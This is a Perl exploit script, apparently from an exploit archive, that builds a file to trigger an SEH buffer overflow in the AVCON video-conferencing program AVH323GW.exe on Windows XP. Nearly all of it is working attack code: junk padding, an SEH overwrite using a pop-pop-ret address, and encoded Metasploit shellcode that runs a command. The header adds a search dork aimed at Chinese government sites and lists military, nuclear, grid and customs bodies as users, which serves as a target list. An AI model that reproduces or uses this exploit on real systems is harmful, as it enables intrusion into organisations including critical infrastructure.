#!/usr/bin/perl

# Exploit Title: AVCON Buffer Overflow
# Date: 5/7/10
# Author: Dillon Beresford 
# URL: http://www.avcon.com.cn/ 
# Version: 4.6.8.7
# Tested on: XP SP2 and SP3
# CVE : NONE 
# Code : exploit.pl 
# Twitter: http://twitter.com/D1N
# Dork: site:gov.cn "AVCON"

# There are other bugs... This is just for fun ;-)
# Paste the output from exploit.txt into AVH323GW.exe 
# Enjoy the wang chung++ and look for the other bugs. ;)
 
# 2 products from China and 2 0days in one month dizam! 

# Okay so who uses AVCON4 and why is it so important?
# China's State Grid
# China's State Information Center
# China's Customs armed police 
# China's Shenyang Military Region 
# China's Yunnan Frontier Corps 
# China's Nuclear Agencies
# China Life Insurance Company 
# China Pacific Insurance Group 
# China National Petroleum Corporation 
# Daqing Oilfield Material Group 
# Grace Pai Henan Electric Power 
# China Civil Aviation Information Group 
# China Southern Airlines Co., Ltd.
# Shenzhen International Trust 
# National Grain and Oil Information Center 
# Anyang City of Henan Province E
# Guangdong Food and Drug Administration

my $exploit = "poc.txt";
my $junk = "\x41" x 1019; 
my $nSEH = "\xeb\x06\x90\x90"; # jmp 6 bytes
my $SEH = pack('V',0x200504B4); # pop pop ret 

# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf =
"\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4" .
"\xd2\xe5\x7b\x83\xeb\xfc\xe2\xf4\x38\x3a\x6c\x7b\xc4\xd2" .
"\x85\xf2\x21\xe3\x37\x1f\x4f\x80\xd5\xf0\x96\xde\x6e\x29" .
"\xd0\x59\x97\x53\xcb\x65\xaf\x5d\xf5\x2d\xd4\xbb\x68\xee" .
"\x84\x07\xc6\xfe\xc5\xba\x0b\xdf\xe4\xbc\x26\x22\xb7\x2c" .
"\x4f\x80\xf5\xf0\x86\xee\xe4\xab\x4f\x92\x9d\xfe\x04\xa6" .
"\xaf\x7a\x14\x82\x6e\x33\xdc\x59\xbd\x5b\xc5\x01\x06\x47" .
"\x8d\x59\xd1\xf0\xc5\x04\xd4\x84\xf5\x12\x49\xba\x0b\xdf" .
"\xe4\xbc\xfc\x32\x90\x8f\xc7\xaf\x1d\x40\xb9\xf6\x90\x99" .
"\x9c\x59\xbd\x5f\xc5\x01\x83\xf0\xc8\x99\x6e\x23\xd8\xd3" .
"\x36\xf0\xc0\x59\xe4\xab\x4d\x96\xc1\x5f\x9f\x89\x84\x22" .
"\x9e\x83\x1a\x9b\x9c\x8d\xbf\xf0\xd6\x39\x63\x26\xae\xd3" .
"\x68\xfe\x7d\xd2\xe5\x7b\x94\xba\xd4\xf0\xab\x55\x1a\xae" .
"\x7f\x2c\xeb\x49\x2e\xba\x43\xee\x79\x4f\x1a\xae\xf8\xd4" .
"\x99\x71\x44\x29\x05\x0e\xc1\x69\xa2\x68\xb6\xbd\x8f\x7b" .
"\x97\x2d\x30\x18\xa5\xbe\x86\x7b";

my $padding   = "\x90" x 5000; # padding
my $payload = $junk.$nSEH.$SEH.$buf.$padding;
open (myfile,">$exploit");
print myfile $payload;
close (myfile);